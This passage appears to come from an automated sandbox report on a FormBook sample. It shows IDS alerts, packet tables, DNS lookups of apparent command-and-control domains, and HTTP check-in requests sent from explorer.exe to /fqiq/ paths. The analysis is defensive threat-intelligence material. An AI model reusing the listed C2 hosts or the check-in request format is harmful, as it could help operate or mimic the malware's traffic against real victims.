                                            10/27/21-19:14:41.554748TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:14:41.554748TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:14:41.554748TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.2.3108.167.135.122
                                            10/27/21-19:15:07.816297TCP1201ATTACK-RESPONSES 403 Forbidden804981934.102.136.180192.168.2.3
                                            10/27/21-19:15:13.056881TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191
                                            10/27/21-19:15:13.056881TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191
                                            10/27/21-19:15:13.056881TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.3116.212.126.191

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 27, 2021 19:14:12.858870983 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.138322115 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.138437033 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.138565063 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.417850971 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425698996 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425728083 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425744057 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425762892 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425780058 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425795078 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.425839901 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.425888062 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.426031113 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426050901 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426067114 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426088095 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.426153898 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.426187992 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.624480009 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706497908 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706543922 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706577063 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706649065 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706767082 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706790924 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706811905 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.706872940 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.706916094 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:13.903980017 CEST8049776157.7.107.193192.168.2.3
                                            Oct 27, 2021 19:14:13.904166937 CEST4977680192.168.2.3157.7.107.193
                                            Oct 27, 2021 19:14:19.023962975 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.347073078 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.347214937 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.347495079 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.670664072 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.671010017 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.671348095 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.672274113 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:19.672380924 CEST4978680192.168.2.3104.233.161.241
                                            Oct 27, 2021 19:14:19.993608952 CEST8049786104.233.161.241192.168.2.3
                                            Oct 27, 2021 19:14:24.801487923 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:24.933523893 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:24.933696032 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:24.933825016 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.065771103 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.242954016 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.242989063 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.243014097 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.243177891 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.243274927 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.244034052 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:25.244129896 CEST4978880192.168.2.345.93.101.51
                                            Oct 27, 2021 19:14:25.375250101 CEST804978845.93.101.51192.168.2.3
                                            Oct 27, 2021 19:14:30.316782951 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.605027914 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.605206966 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.605387926 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.894412994 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.894438982 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:30.894551992 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:30.894620895 CEST4978980192.168.2.3203.170.80.253
                                            Oct 27, 2021 19:14:31.180448055 CEST8049789203.170.80.253192.168.2.3
                                            Oct 27, 2021 19:14:35.938410997 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.087071896 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.087194920 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.087368965 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.235853910 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.235888004 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.235897064 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:36.236080885 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.236135006 CEST4981180192.168.2.318.118.119.183
                                            Oct 27, 2021 19:14:36.384989977 CEST804981118.118.119.183192.168.2.3
                                            Oct 27, 2021 19:14:41.410120010 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.550868988 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.554598093 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.554748058 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.696489096 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.696507931 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:41.696680069 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.696784973 CEST4981680192.168.2.3108.167.135.122
                                            Oct 27, 2021 19:14:41.837260008 CEST8049816108.167.135.122192.168.2.3
                                            Oct 27, 2021 19:14:51.956742048 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.189244032 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.189414024 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.189634085 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.424355030 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.424613953 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:52.660298109 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.660327911 CEST8049817156.240.150.22192.168.2.3
                                            Oct 27, 2021 19:14:52.660429955 CEST4981780192.168.2.3156.240.150.22
                                            Oct 27, 2021 19:14:57.472357035 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.489407063 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.489501953 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.489799023 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.506618977 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515161991 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515211105 CEST8049818172.67.216.2192.168.2.3
                                            Oct 27, 2021 19:14:57.515415907 CEST4981880192.168.2.3172.67.216.2
                                            Oct 27, 2021 19:14:57.515533924 CEST4981880192.168.2.3172.67.216.2

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 27, 2021 19:14:12.577754974 CEST6082353192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:12.846904039 CEST53608238.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:18.644517899 CEST5510253192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:19.019355059 CEST53551028.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:24.676934004 CEST5623653192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:24.800334930 CEST53562368.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:30.284463882 CEST5652753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:30.315530062 CEST53565278.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:35.913027048 CEST4955953192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:35.937032938 CEST53495598.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:41.296065092 CEST5265053192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:41.403433084 CEST53526508.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:46.738342047 CEST6329753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:46.759346008 CEST53632978.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:51.773514032 CEST5836153192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:51.955020905 CEST53583618.8.8.8192.168.2.3
                                            Oct 27, 2021 19:14:57.447910070 CEST5361553192.168.2.38.8.8.8
                                            Oct 27, 2021 19:14:57.469948053 CEST53536158.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:07.595096111 CEST5072853192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:07.616633892 CEST53507288.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:12.819777966 CEST5377753192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:12.840934992 CEST53537778.8.8.8192.168.2.3
                                            Oct 27, 2021 19:15:18.369975090 CEST5710653192.168.2.38.8.8.8
                                            Oct 27, 2021 19:15:18.393908978 CEST53571068.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Oct 27, 2021 19:14:12.577754974 CEST192.168.2.38.8.8.80x44dbStandard query (0)www.isshinn1.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:18.644517899 CEST192.168.2.38.8.8.80x40dStandard query (0)www.rdoi.topA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:24.676934004 CEST192.168.2.38.8.8.80xe7e1Standard query (0)www.megacinema.clubA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:30.284463882 CEST192.168.2.38.8.8.80x9895Standard query (0)www.passiverewardssystems.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:35.913027048 CEST192.168.2.38.8.8.80x82d0Standard query (0)www.sosoon.storeA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:41.296065092 CEST192.168.2.38.8.8.80x9466Standard query (0)www.esyscoloradosprings.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:46.738342047 CEST192.168.2.38.8.8.80xff22Standard query (0)www.creationslazzaroni.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:51.773514032 CEST192.168.2.38.8.8.80xacddStandard query (0)www.24000words.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.447910070 CEST192.168.2.38.8.8.80xd480Standard query (0)www.healthyweekendtips.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:07.595096111 CEST192.168.2.38.8.8.80x1121Standard query (0)www.thedusi.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:12.819777966 CEST192.168.2.38.8.8.80x87b4Standard query (0)www.mask60.comA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:18.369975090 CEST192.168.2.38.8.8.80x4685Standard query (0)www.qywyfeo8.xyzA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Oct 27, 2021 19:14:12.846904039 CEST8.8.8.8192.168.2.30x44dbNo error (0)www.isshinn1.com157.7.107.193A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:19.019355059 CEST8.8.8.8192.168.2.30x40dNo error (0)www.rdoi.top104.233.161.241A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:24.800334930 CEST8.8.8.8192.168.2.30xe7e1No error (0)www.megacinema.clubmegacinema.clubCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:14:24.800334930 CEST8.8.8.8192.168.2.30xe7e1No error (0)megacinema.club45.93.101.51A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:30.315530062 CEST8.8.8.8192.168.2.30x9895No error (0)www.passiverewardssystems.com203.170.80.253A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:35.937032938 CEST8.8.8.8192.168.2.30x82d0No error (0)www.sosoon.store18.118.119.183A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:41.403433084 CEST8.8.8.8192.168.2.30x9466No error (0)www.esyscoloradosprings.comwebsites076.homestead.comCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:14:41.403433084 CEST8.8.8.8192.168.2.30x9466No error (0)websites076.homestead.com108.167.135.122A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:46.759346008 CEST8.8.8.8192.168.2.30xff22Name error (3)www.creationslazzaroni.comnonenoneA (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:51.955020905 CEST8.8.8.8192.168.2.30xacddNo error (0)www.24000words.com156.240.150.22A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.469948053 CEST8.8.8.8192.168.2.30xd480No error (0)www.healthyweekendtips.com172.67.216.2A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:14:57.469948053 CEST8.8.8.8192.168.2.30xd480No error (0)www.healthyweekendtips.com104.21.78.41A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:07.616633892 CEST8.8.8.8192.168.2.30x1121No error (0)www.thedusi.comthedusi.comCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:15:07.616633892 CEST8.8.8.8192.168.2.30x1121No error (0)thedusi.com34.102.136.180A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:12.840934992 CEST8.8.8.8192.168.2.30x87b4No error (0)www.mask60.commask60.comCNAME (Canonical name)IN (0x0001)
                                            Oct 27, 2021 19:15:12.840934992 CEST8.8.8.8192.168.2.30x87b4No error (0)mask60.com116.212.126.191A (IP address)IN (0x0001)
                                            Oct 27, 2021 19:15:18.393908978 CEST8.8.8.8192.168.2.30x4685Name error (3)www.qywyfeo8.xyznonenoneA (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.isshinn1.com
                                            • www.rdoi.top
                                            • www.megacinema.club
                                            • www.passiverewardssystems.com
                                            • www.sosoon.store
                                            • www.esyscoloradosprings.com
                                            • www.24000words.com
                                            • www.healthyweekendtips.com
                                            • www.thedusi.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.349776157.7.107.19380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:13.138565063 CEST1814OUTGET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1
                                            Host: www.isshinn1.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:13.425698996 CEST1840INHTTP/1.1 404 Not Found
                                            Date: Wed, 27 Oct 2021 17:14:13 GMT
                                            Content-Type: text/html
                                            Content-Length: 19220
                                            Connection: close
                                            Server: Apache
                                            Last-Modified: Mon, 23 Jul 2018 06:31:26 GMT
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 63 61 70 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 0a 20 20 20 20 20
                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; font-weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex;


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349786104.233.161.24180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:19.347495079 CEST8036OUTGET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.rdoi.top
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:19.671010017 CEST8036INHTTP/1.1 404 Not Found
                                            Date: Wed, 27 Oct 2021 17:14:19 GMT
                                            Server: Apache
                                            Content-Length: 258
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.34978845.93.101.5180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 27, 2021 19:14:24.933825016 CEST9731OUTGET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1
                                            Host: www.megacinema.club
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:25.242954016 CEST9732INHTTP/1.1 404 Not Found
                                            Connection: close
                                            content-type: text/html
                                            last-modified: Tue, 09 Jul 2019 06:18:14 GMT
                                            etag: "999-5d2431a6-22b54e502ae80759;;;"
                                            accept-ranges: bytes
                                            content-length: 2457
                                            date: Wed, 27 Oct 2021 17:14:25 GMT
                                            server: LiteSpeed
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 